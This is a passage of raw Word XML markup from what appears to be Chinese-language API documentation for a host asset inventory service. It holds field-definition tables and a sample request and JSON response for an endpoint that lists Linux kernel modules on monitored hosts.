            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1A210698" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="166CBC07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>moduleName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64760E90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2019A918" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1378BE16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3D8B3928" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0006BC54" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D73A474" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7878C9FC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CE9B9D7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="40624442" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="211C9B62" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6181CEFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEF0904" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C39CC60" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>模块版本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14E17976" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FD6368" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>kernelmodule</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1BDB67D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2AB15D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "fe107d9c77f4c77a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "172.16.2.244",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.78.131",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 41,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "12345",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "标签a"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "xdu-vm-cent51",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>moduleName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ablk_helper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "description": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "path": "/lib/modules/4.4.0-21-generic/kernel/crypto/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ablk_helper.ko</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "version": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "size": 16384,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "depends": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cryptd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "holders": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aesni_intel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE320F7"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516"/>
        <w:gridCol w:w="1220"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="1791"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F15784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77477F4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A2A856A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C4CE8B4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D88403E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5855BE95" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05B4B30F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004609D0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19F32F5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="216C71C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">agent </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uuid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="12C774A9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C7D3DA2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BB25216" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2303CE91" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64184978" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4895AB05" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D338BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A3446C3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="328B5EBD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27BE3F78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6E5A6F83" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30CEC326" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0721449A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2251797A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AADF345" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38B6B1BF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E74DF71" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04ACA66E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E797C29" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="459D258F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5BF8CECE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53CDBB36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1693E3C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4295347C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="710B5CEC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="269EF8E5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7322A573" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13322D35" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06FD0A9F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348D2A5D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3E05E185" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BBF2B21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FE664D6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34B72309" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70C7DA12" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2E357C39" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02A98443" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C43A2C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09C7AA99" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BE869F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0C40F2ED" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54EB7497" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67E4B58C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C159CE4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
